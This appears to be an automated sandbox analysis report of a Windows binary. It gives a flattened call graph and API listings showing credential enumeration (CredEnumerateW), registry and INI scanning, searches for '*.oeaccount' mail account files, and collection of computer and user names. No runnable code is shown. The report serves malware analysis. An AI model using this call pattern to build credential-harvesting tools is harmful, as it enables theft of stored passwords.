33290->33289 33292 40cd08 ??2@YAPAXI 33291->33292 33294 40cd26 33292->33294 33295 40cd2d 33292->33295 33362 404025 6 API calls 33294->33362 33297 40cd66 33295->33297 33298 40cd59 DeleteObject 33295->33298 33355 407088 33297->33355 33298->33297 33300 40cd6b 33358 4019b5 33300->33358 33303 4019b5 strncat 33304 40cdbf _mbscpy 33303->33304 33304->33234 33364 407948 free free 33305->33364 33307 407cf7 33310 407a1f malloc memcpy free free 33307->33310 33311 407ddc 33307->33311 33313 407d7a free 33307->33313 33318 407e04 33307->33318 33368 40796e 7 API calls 33307->33368 33369 406f30 33307->33369 33310->33307 33311->33318 33377 407a1f 33311->33377 33313->33307 33365 407a55 33318->33365 33319 407e30 33320 407e57 33319->33320 33321 407e38 33319->33321 33320->33239 33320->33240 33321->33320 33322 407e41 _strcmpi 33321->33322 33322->33320 33322->33321 33383 4097ff 33323->33383 33325 409854 33388 409731 33325->33388 33329 4097ff 3 API calls 33328->33329 33330 409723 33329->33330 33408 40966c 33330->33408 33422 4023b2 33333->33422 33338 40ced3 33511 40cdda 7 API calls 33338->33511 33339 40cece 33343 40cf3f 33339->33343 33463 40c3d0 memset GetModuleFileNameA strrchr 33339->33463 33343->33264 33343->33265 33346 40ceed 33490 40affa 33346->33490 33350->33262 33351->33271 33352->33253 33353->33260 33354->33267 33363 406fc7 memset _mbscpy 33355->33363 33357 40709f CreateFontIndirectA 33357->33300 33359 4019e1 33358->33359 33360 4019c2 strncat 33359->33360 33361 4019e5 memset LoadIconA 33359->33361 33360->33359 33361->33303 33362->33295 33363->33357 33364->33307 33366 407a65 33365->33366 33367 407a5b free 33365->33367 33366->33319 33367->33366 33368->33307 33370 406f37 malloc 33369->33370 33371 406f7d 33369->33371 33373 406f73 33370->33373 33374 406f58 33370->33374 33371->33307 33373->33307 33375 406f6c free 33374->33375 33376 406f5c memcpy 33374->33376 33375->33373 33376->33375 33378 407a38 33377->33378 33379 407a2d free 33377->33379 33381 406f30 3 API calls 33378->33381 33380 407a43 33379->33380 33382 40796e 7 API calls 33380->33382 33381->33380 33382->33318 33399 406f96 GetModuleFileNameA 33383->33399 33385 409805 strrchr 33386 409814 33385->33386 33387 409817 _mbscat 33385->33387 33386->33387 33387->33325 33400 44b090 33388->33400 33393 40930c 3 API calls 33394 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33393->33394 33395 4097c5 LoadStringA 33394->33395 33396 4097db 33395->33396 33396->33395 33398 4097f3 33396->33398 33407 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33396->33407 33398->33245 33399->33385 33401 40973e _mbscpy _mbscpy 33400->33401 33402 40930c 33401->33402 33403 44b090 33402->33403 33404 409319 memset GetPrivateProfileStringA 33403->33404 33405 409374 33404->33405 33406 409364 WritePrivateProfileStringA 33404->33406 33405->33393 33406->33405 33407->33396 33418 406f81 GetFileAttributesA 33408->33418 33410 409675 33411 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33410->33411 33417 4096ee 33410->33417 33419 409278 GetPrivateProfileStringA 33411->33419 33413 4096c9 33420 409278 GetPrivateProfileStringA 33413->33420 33415 4096da 33421 409278 GetPrivateProfileStringA 33415->33421 33417->33246 33418->33410 33419->33413 33420->33415 33421->33417 33513 409c1c 33422->33513 33425 401e69 memset 33552 410dbb 33425->33552 33428 401ec2 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33428->33582 33429 401ed4 33567 406f81 GetFileAttributesA 33429->33567 33432 401ee6 strlen strlen 33434 401f15 33432->33434 33435 401f28 33432->33435 33583 4070e3 strlen _mbscat _mbscpy _mbscat 33434->33583 33568 406f81 GetFileAttributesA 33435->33568 33438 401f35 33569 401c31 33438->33569 33441 401f75 33581 410a9c RegOpenKeyExA 33441->33581 33442 401c31 7 API calls 33442->33441 33444 401f91 33445 402187 33444->33445 33446 401f9c memset 33444->33446 33448 402195 ExpandEnvironmentStringsA 33445->33448 33449 4021a8 _strcmpi 33445->33449 33584 410b62 RegEnumKeyExA 33446->33584 33593 406f81 GetFileAttributesA 33448->33593 33449->33338 33449->33339 33451 40217e RegCloseKey 33451->33445 33452 401fd9 atoi 33453 401fef memset memset sprintf 33452->33453 33461 401fc9 33452->33461 33585 410b1e 33453->33585 33456 402165 33456->33451 33457 402076 memset memset strlen strlen 33457->33461 33458 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33461 33459 4020dd strlen strlen 33459->33461 33460 406f81 GetFileAttributesA 33460->33461 33461->33451 33461->33452 33461->33456 33461->33457 33461->33458 33461->33459 33461->33460 33462 402167 _mbscpy 33461->33462 33592 410b62 RegEnumKeyExA 33461->33592 33462->33451 33464 40c422 33463->33464 33465 40c425 _mbscat _mbscpy _mbscpy 33463->33465 33464->33465 33466 40c49d 33465->33466 33467 40c512 33466->33467 33468 40c502 GetWindowPlacement 33466->33468 33469 40c538 33467->33469 33614 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33467->33614 33468->33467 33607 409b31 33469->33607 33473 40ba28 33474 40ba87 33473->33474 33480 40ba3c 33473->33480 33617 406c62 LoadCursorA SetCursor 33474->33617 33476 40ba8c 33618 410a9c RegOpenKeyExA 33476->33618 33619 404734 33476->33619 33627 4107f1 33476->33627 33630 404785 33476->33630 33633 403c16 33476->33633 33477 40ba43 _mbsicmp 33477->33480 33478 40baa0 33479 407e30 _strcmpi 33478->33479 33483 40bab0 33479->33483 33480->33474 33480->33477 33709 40b5e5 10 API calls 33480->33709 33481 40bafa SetCursor 33481->33346 33483->33481 33484 40baf1 qsort 33483->33484 33484->33481 34069 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33490->34069 33492 40b00e 33493 40b016 33492->33493 33494 40b01f GetStdHandle 33492->33494 34070 406d1a CreateFileA 33493->34070 33496 40b01c 33494->33496 33497 40b035 33496->33497 33498 40b12d 33496->33498 34071 406c62 LoadCursorA SetCursor 33497->34071 34075 406d77 9 API calls 33498->34075 33501 40b136 33512 40c580 28 API calls 33501->33512 33502 40b087 33509 40b0a1 33502->33509 34073 40a699 12 API calls 33502->34073 33503 40b042 33503->33502 33503->33509 34072 40a57c strlen WriteFile 33503->34072 33506 40b0d6 33507 40b116 CloseHandle 33506->33507 33508 40b11f SetCursor 33506->33508 33507->33508 33508->33501 33509->33506 34074 406d77 9 API calls 33509->34074 33511->33339 33512->33343 33525 409a32 33513->33525 33516 409c80 memcpy memcpy 33517 409cda 33516->33517 33517->33516 33518 409d18 ??2@YAPAXI ??2@YAPAXI 33517->33518 33519 408db6 12 API calls 33517->33519 33521 409d54 ??2@YAPAXI 33518->33521 33522 409d8b 33518->33522 33519->33517 33521->33522 33522->33522 33535 409b9c 33522->33535 33524 4023c1 33524->33425 33526 409a44 33525->33526 33527 409a3d ??3@YAXPAX 33525->33527 33528 409a52 33526->33528 33529 409a4b ??3@YAXPAX 33526->33529 33527->33526 33530 409a63 33528->33530 33531 409a5c ??3@YAXPAX 33528->33531 33529->33528 33532 409a83 ??2@YAPAXI ??2@YAPAXI 33530->33532 33533 409a73 ??3@YAXPAX 33530->33533 33534 409a7c ??3@YAXPAX 33530->33534 33531->33530 33532->33516 33533->33534 33534->33532 33536 407a55 free 33535->33536 33537 409ba5 33536->33537 33538 407a55 free 33537->33538 33539 409bad 33538->33539 33540 407a55 free 33539->33540 33541 409bb5 33540->33541 33542 407a55 free 33541->33542 33543 409bbd 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bd0 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409bda 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409be4 33548->33549 33550 407a1f 4 API calls 33549->33550 33551 409bee 33550->33551 33551->33524 33553 410d0e 2 API calls 33552->33553 33554 410dca 33553->33554 33555 410dfd memset 33554->33555 33594 4070ae 33554->33594 33557 410e1d 33555->33557 33597 410a9c RegOpenKeyExA 33557->33597 33560 401e9e strlen strlen 33560->33428 33560->33429 33561 410e4a 33562 410e7f _mbscpy 33561->33562 33598 410d3d _mbscpy 33561->33598 33562->33560 33564 410e5b 33599 410add RegQueryValueExA 33564->33599 33566 410e73 RegCloseKey 33566->33562 33567->33432 33568->33438 33600 410a9c RegOpenKeyExA 33569->33600 33571 401c4c 33572 401cad 33571->33572 33601 410add RegQueryValueExA 33571->33601 33572->33441 33572->33442 33574 401c6a 33575 401c71 strchr 33574->33575 33576 401ca4 RegCloseKey 33574->33576 33575->33576 33577 401c85 strchr 33575->33577 33576->33572 33577->33576 33578 401c94 33577->33578 33602 406f06 strlen 33578->33602 33580 401ca1 33580->33576 33581->33444 33582->33429 33583->33435 33584->33461 33605 410a9c RegOpenKeyExA 33585->33605 33587 410b34 33588 410b5d 33587->33588 33606 410add RegQueryValueExA 33587->33606 33588->33461 33590 410b4c RegCloseKey 33590->33588 33592->33461 33593->33449 33595 4070bd GetVersionExA 33594->33595 33596 4070ce 33594->33596 33595->33596 33596->33555 33596->33560 33597->33561 33598->33564 33599->33566 33600->33571 33601->33574 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33580 33605->33587 33606->33590 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33473 33616 409868 SendMessageA 33612->33616 33614->33469 33615->33610 33616->33611 33617->33476 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33478 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33478 33629->33628 33631 4047a3 33630->33631 33632 404799 FreeLibrary 33630->33632 33631->33478 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33905 402bd1 40 API calls 33659->33905 33770 410a9c RegOpenKeyExA 33660->33770 33663 403d0a 33664 403d1c 33663->33664 33906 402bd1 40 API calls 33663->33906 33771 402c5d 33664->33771 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33789 410a9c RegOpenKeyExA 33669->33789 33671 403d51 33672 403d61 33671->33672 33907 402b22 47 API calls 33671->33907 33790 410a9c RegOpenKeyExA 33672->33790 33675 403d87 33676 403d97 33675->33676 33908 402b22 47 API calls 33675->33908 33791 410a9c RegOpenKeyExA 33676->33791 33679 403dbd 33680 403dcd 33679->33680 33909 402b22 47 API calls 33679->33909 33792 410808 33680->33792 33684 404785 FreeLibrary 33685 403de8 33684->33685 33796 402fdb 33685->33796 33688 402fdb 34 API calls 33689 403e00 33688->33689 33812 4032b7 33689->33812 33698 403e3b 33700 403e73 33698->33700 33701 403e46 _mbscpy 33698->33701 33859 40fb00 33700->33859 33911 40f334 334 API calls 33701->33911 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33912 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33912 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33913 4021b6 memset 33716->33913 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33914 4023e5 16 API calls 33719->33914 33720->33719 33723 4085e2 33722->33723 33915 4082cd 11 API calls 33723->33915 33727 408600 33728 403cba 33727->33728 33729 40860b memset 33727->33729 33740 40821d 33728->33740 33918 410b62 RegEnumKeyExA 33729->33918 33731 408637 33732 4086d2 RegCloseKey 33731->33732 33734 40865c memset 33731->33734 33919 410a9c RegOpenKeyExA 33731->33919 33922 410b62 RegEnumKeyExA 33731->33922 33732->33728 33920 410add RegQueryValueExA 33734->33920 33737 408694 33921 40848b 10 API calls 33737->33921 33739 4086ab RegCloseKey 33739->33731 33923 410a9c RegOpenKeyExA 33740->33923 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33924 410b62 RegEnumKeyExA 33744->33924 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33925 410a9c RegOpenKeyExA 33748->33925 33926 4080ed 11 API calls 33748->33926 33927 410b62 RegEnumKeyExA 33748->33927 33751 4082a2 RegCloseKey 33751->33748 33928 4045db 33752->33928 33756 40872d 33758 408737 wcslen 33756->33758 33760 4088ef 33756->33760 33758->33760 33766 40876a 33758->33766 33759 40872b CredEnumerateW 33759->33756 33936 404656 33760->33936 33761 40877a wcsncmp 33761->33766 33763 404734 3 API calls 33763->33766 33764 404785 FreeLibrary 33764->33766 33765 408812 memset 33765->33766 33767 40883c memcpy wcschr 33765->33767 33766->33760 33766->33761 33766->33763 33766->33764 33766->33765 33766->33767 33768 4088c3 LocalFree 33766->33768 33939 40466b _mbscpy 33766->33939 33767->33766 33768->33766 33769 410a9c RegOpenKeyExA 33769->33659 33770->33663 33940 410a9c RegOpenKeyExA 33771->33940 33773 402c7a 33774 402da5 33773->33774 33775 402c87 memset 33773->33775 33774->33668 33941 410b62 RegEnumKeyExA 33775->33941 33777 402d9c RegCloseKey 33777->33774 33778 410b1e 3 API calls 33779 402ce4 memset sprintf 33778->33779 33942 410a9c RegOpenKeyExA 33779->33942 33781 402d28 33782 402d3a sprintf 33781->33782 33943 402bd1 40 API calls 33781->33943 33944 410a9c RegOpenKeyExA 33782->33944 33785 402cb2 33785->33777 33785->33778 33788 402d9a 33785->33788 33945 402bd1 40 API calls 33785->33945 33946 410b62 RegEnumKeyExA 33785->33946 33788->33777 33789->33671 33790->33675 33791->33679 33793 410816 33792->33793 33794 4107f1 FreeLibrary 33793->33794 33795 403ddd 33794->33795 33795->33684 33947 410a9c RegOpenKeyExA 33796->33947 33798 402ff9 33799 403006 memset 33798->33799 33800 40312c 33798->33800 33948 410b62 RegEnumKeyExA 33799->33948 33800->33688 33802 403122 RegCloseKey 33802->33800 33803 410b1e 3 API calls 33804 403058 memset sprintf 33803->33804 33949 410a9c RegOpenKeyExA 33804->33949 33806 403033 33806->33802 33806->33803 33807 4030a2 memset 33806->33807 33808 410b62 RegEnumKeyExA 33806->33808 33810 4030f9 RegCloseKey 33806->33810 33951 402db3 26 API calls 33806->33951 33950 410b62 RegEnumKeyExA 33807->33950 33808->33806 33810->33806 33813 4032d5 33812->33813 33814 4033a9 33812->33814 33952 4021b6 memset 33813->33952 33827 4034e4 memset memset 33814->33827 33816 4032e1 33953 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33816->33953 33818 4032ea 33819 4032f8 memset GetPrivateProfileSectionA 33818->33819 33954 4023e5 16 API calls 33818->33954 33819->33814 33824 40332f 33819->33824 33821 40339b strlen 33821->33814 33821->33824 33823 403350 strchr 33823->33824 33824->33814 33824->33821 33955 4021b6 memset 33824->33955 33956 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33824->33956 33957 4023e5 16 API calls 33824->33957 33828 410b1e 3 API calls 33827->33828 33829 40353f 33828->33829 33830 40357f 33829->33830 33831 403546 _mbscpy 33829->33831 33835 403985 33830->33835 33958 406d55 strlen _mbscat 33831->33958 33833 403565 _mbscat 33959 4033f0 19 API calls 33833->33959 33960 40466b _mbscpy 33835->33960 33839 4039aa 33840 4039ff 33839->33840 33961 40f460 memset memset 33839->33961 33982 40f6e2 33839->33982 33998 4038e8 21 API calls 33839->33998 33842 404785 FreeLibrary 33840->33842 33843 403a0b 33842->33843 33844 4037ca memset memset 33843->33844 34006 444551 memset 33844->34006 33847 4038e2 33847->33698 33910 40f334 334 API calls 33847->33910 33849 40382e 33850 406f06 2 API calls 33849->33850 33851 403843 33850->33851 33852 406f06 2 API calls 33851->33852 33853 403855 strchr 33852->33853 33854 403884 _mbscpy 33853->33854 33855 403897 strlen 33853->33855 33856 4038bf _mbscpy 33854->33856 33855->33856 33857 4038a4 sprintf 33855->33857 34018 4023e5 16 API calls 33856->34018 33857->33856 33860 44b090 33859->33860 33861 40fb10 RegOpenKeyExA 33860->33861 33862 403e7f 33861->33862 33863 40fb3b RegOpenKeyExA 33861->33863 33873 40f96c 33862->33873 33864 40fb55 RegQueryValueExA 33863->33864 33865 40fc2d RegCloseKey 33863->33865 33866 40fc23 RegCloseKey 33864->33866 33867 40fb84 33864->33867 33865->33862 33866->33865 33868 404734 3 API calls 33867->33868 33869 40fb91 33868->33869 33869->33866 33870 40fc19 LocalFree 33869->33870 33871 40fbdd memcpy memcpy 33869->33871 33870->33866 34023 40f802 11 API calls 33871->34023 33874 4070ae GetVersionExA 33873->33874 33875 40f98d 33874->33875 33876 4045db 7 API calls 33875->33876 33884 40f9a9 33876->33884 33877 40fae6 33878 404656 FreeLibrary 33877->33878 33879 403e85 33878->33879 33885 4442ea memset 33879->33885 33880 40fa13 memset WideCharToMultiByte 33881 40fa43 _strnicmp 33880->33881 33880->33884 33882 40fa5b WideCharToMultiByte 33881->33882 33881->33884 33883 40fa88 WideCharToMultiByte 33882->33883 33882->33884 33883->33884 33884->33877 33884->33880 33886 410dbb 9 API calls 33885->33886 33887 444329 33886->33887 34024 40759e strlen strlen 33887->34024 33892 410dbb 9 API calls 33893 444350 33892->33893 33894 40759e 3 API calls 33893->33894 33895 44435a 33894->33895 33896 444212 65 API calls 33895->33896 33897 444366 memset memset 33896->33897 33898 410b1e 3 API calls 33897->33898 33899 4443b9 ExpandEnvironmentStringsA strlen 33898->33899 33900 4443f4 _strcmpi 33899->33900 33901 4443e5 33899->33901 33902 403e91 33900->33902 33903 44440c 33900->33903 33901->33900 33902->33478 33904 444212 65 API calls 33903->33904 33904->33902 33905->33660 33906->33664 33907->33672 33908->33676 33909->33680 33910->33698 33911->33700 33912->33713 33913->33718 33914->33714 33916 40841c 33915->33916 33917 410a9c RegOpenKeyExA 33916->33917 33917->33727 33918->33731 33919->33731 33920->33737 33921->33739 33922->33731 33923->33742 33924->33748 33925->33748 33926->33751 33927->33748 33929 404656 FreeLibrary 33928->33929 33930 4045e3 LoadLibraryA 33929->33930 33931 404651 33930->33931 33932 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33930->33932 33931->33756 33931->33759 33931->33760 33933 40463d 33932->33933 33934 404643 33933->33934 33935 404656 FreeLibrary 33933->33935 33934->33931 33935->33931 33937 403cd2 33936->33937 33938 40465c FreeLibrary 33936->33938 33937->33769 33938->33937 33939->33766 33940->33773 33941->33785 33942->33781 33943->33782 33944->33785 33945->33785 33946->33785 33947->33798 33948->33806 33949->33806 33950->33806 33951->33806 33952->33816 33953->33818 33954->33819 33955->33823 33956->33824 33957->33824 33958->33833 33959->33830 33960->33839 33999 4078ba 33961->33999 33964 4078ba _mbsnbcat 33965 40f5a3 RegOpenKeyExA 33964->33965 33966 40f5c3 RegQueryValueExA 33965->33966 33967 40f6d9 33965->33967 33968 40f6d0 RegCloseKey 33966->33968 33969 40f5f0 33966->33969 33967->33839 33968->33967 33969->33968 33970 40f675 33969->33970 34003 40466b _mbscpy 33969->34003 33970->33968 34004 4012ee strlen 33970->34004 33972 40f611 33974 404734 3 API calls 33972->33974 33979 40f616 33974->33979 33975 40f69e RegQueryValueExA 33975->33968 33976 40f6c1 33975->33976 33976->33968 33977 40f66a 33978 404785 FreeLibrary 33977->33978 33978->33970 33979->33977 33980 40f661 LocalFree 33979->33980 33981 40f645 memcpy 33979->33981 33980->33977 33981->33980 34005 40466b _mbscpy 33982->34005 33984 40f6fa 33985 4045db 7 API calls 33984->33985 33986 40f708 33985->33986 33987 40f7e2 33986->33987 33988 404734 3 API calls 33986->33988 33989 404656 FreeLibrary 33987->33989 33993 40f715 33988->33993 33990 40f7f1 33989->33990 33991 404785 FreeLibrary 33990->33991 33992 40f7fc 33991->33992 33992->33839 33993->33987 33994 40f797 WideCharToMultiByte 33993->33994 33995 40f7b8 strlen 33994->33995 33996 40f7d9 LocalFree 33994->33996 33995->33996 33997 40f7c8 _mbscpy 33995->33997 33996->33987 33997->33996 33998->33839 34000 4078e6 33999->34000 34001 4078c7 _mbsnbcat 34000->34001 34002 4078ea 34000->34002 34001->34000 34002->33964 34003->33972 34004->33975 34005->33984 34019 410a9c RegOpenKeyExA 34006->34019 34008 44458b 34009 40381a 34008->34009 34020 410add RegQueryValueExA 34008->34020 34009->33847 34017 4021b6 memset 34009->34017 34011 4445dc RegCloseKey 34011->34009 34012 4445a4 34012->34011 34021 410add RegQueryValueExA 34012->34021 34014 4445c1 34014->34011 34022 444879 30 API calls 34014->34022 34016 4445da 34016->34011 34017->33849 34018->33847 34019->34008 34020->34012 34021->34014 34022->34016 34023->33870 34025 4075c9 34024->34025 34026 4075bb _mbscat 34024->34026 34027 444212 34025->34027 34026->34025 34044 407e9d 34027->34044 34030 44424d 34031 444274 34030->34031 34032 444258 34030->34032 34052 407ef8 34030->34052 34033 407e9d 9 API calls 34031->34033 34065 444196 52 API calls 34032->34065 34040 4442a0 34033->34040 34035 407ef8 9 API calls 34035->34040 34036 4442ce 34062 407f90 34036->34062 34040->34035 34040->34036 34042 444212 65 API calls 34040->34042 34066 407e62 strcmp strcmp 34040->34066 34041 407f90 FindClose 34043 4442e4 34041->34043 34042->34040 34043->33892 34045 407f90 FindClose 34044->34045 34046 407eaa 34045->34046 34047 406f06 2 API calls 34046->34047 34048 407ebd strlen strlen 34047->34048 34049 407ee1 34048->34049 34050 407eea 34048->34050 34067 4070e3 strlen _mbscat _mbscpy _mbscat 34049->34067 34050->34030 34053 407f03 FindFirstFileA 34052->34053 34054 407f24 FindNextFileA 34052->34054 34055 407f3f 34053->34055 34056 407f46 strlen strlen 34054->34056 34057 407f3a 34054->34057 34055->34056 34059 407f7f 34055->34059 34056->34059 34060 407f76 34056->34060 34058 407f90 FindClose 34057->34058 34058->34055 34059->34030 34068 4070e3 strlen _mbscat _mbscpy _mbscat 34060->34068 34063 407fa3 34062->34063 34064 407f99 FindClose 34062->34064 34063->34041 34064->34063 34065->34030 34066->34040 34067->34050 34068->34059 34069->33492 34070->33496 34071->33503 34072->33502 34073->33509 34074->33506 34075->33501 34420 43ffc8 18 API calls 34234 4281cc 15 API calls __fprintf_l 34422 4383cc 110 API calls __fprintf_l 34235 4275d3 41 API calls 34423 4153d3 22 API calls __fprintf_l 34236 444dd7 _XcptFilter 34428 4013de 15 API calls 34430 425115 111 API calls __fprintf_l 34431 43f7db 18 API calls 34434 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34238 4335ee 16 API calls __fprintf_l 34436 429fef 11 API calls 34239 444deb _exit _c_exit 34437 40bbf0 138 API calls 34242 425115 79 API calls __fprintf_l 34441 437ffa 22 API calls 34246 4021ff 14 API calls 34247 43f5fc 149 API calls 34442 40e381 9 API calls 34249 405983 40 API calls 34250 42b186 27 API calls __fprintf_l 34251 427d86 76 API calls 34252 403585 20 API calls 34254 42e58e 18 API calls __fprintf_l 34257 425115 75 API calls __fprintf_l 34259 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34446 434395 16 API calls 34261 441d9c memcmp 34448 43f79b 119 API calls 34262 40c599 43 API calls 34449 426741 87 API calls 34266 4401a6 21 API calls 34268 426da6 memcpy memset memset memcpy 34269 4335a5 15 API calls 34271 4299ab memset memset memcpy memset memset 34272 40b1ab 8 API calls 34454 425115 76 API calls __fprintf_l 34458 4113b2 18 API calls 2 library calls 34462 40a3b8 memset sprintf SendMessageA 34076 410bbc 34079 4109cf 34076->34079 34080 4109dc 34079->34080 34081 410a23 memset GetPrivateProfileStringA 34080->34081 34082 4109ea memset 34080->34082 34087 407646 strlen 34081->34087 34092 4075cd sprintf memcpy 34082->34092 34085 410a0c WritePrivateProfileStringA 34086 410a65 34085->34086 34088 40765a 34087->34088 34089 40765c 34087->34089 34088->34086 34091 4076a3 34089->34091 34093 40737c strtoul 34089->34093 34091->34086 34092->34085 34093->34089 34274 40b5bf memset memset _mbsicmp

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040832F
                                                                                      • memset.MSVCRT ref: 00408343
                                                                                      • memset.MSVCRT ref: 0040835F
                                                                                      • memset.MSVCRT ref: 00408376
                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                      • strlen.MSVCRT ref: 004083E9
                                                                                      • strlen.MSVCRT ref: 004083F8
                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                      • API String ID: 1832431107-3760989150
                                                                                      • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                      • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 453 407f3f-407f44 451->453 454 407f46-407f74 strlen * 2 452->454 455 407f3a call 407f90 452->455 453->454 457 407f89-407f8f 453->457 458 407f83 454->458 459 407f76-407f81 call 4070e3 454->459 455->453 461 407f86-407f88 458->461 459->461 461->457
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                                      • strlen.MSVCRT ref: 00407F64
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                      • String ID: ACD
                                                                                      • API String ID: 379999529-620537770
                                                                                      • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                      • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                      • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                      • memset.MSVCRT ref: 00402003
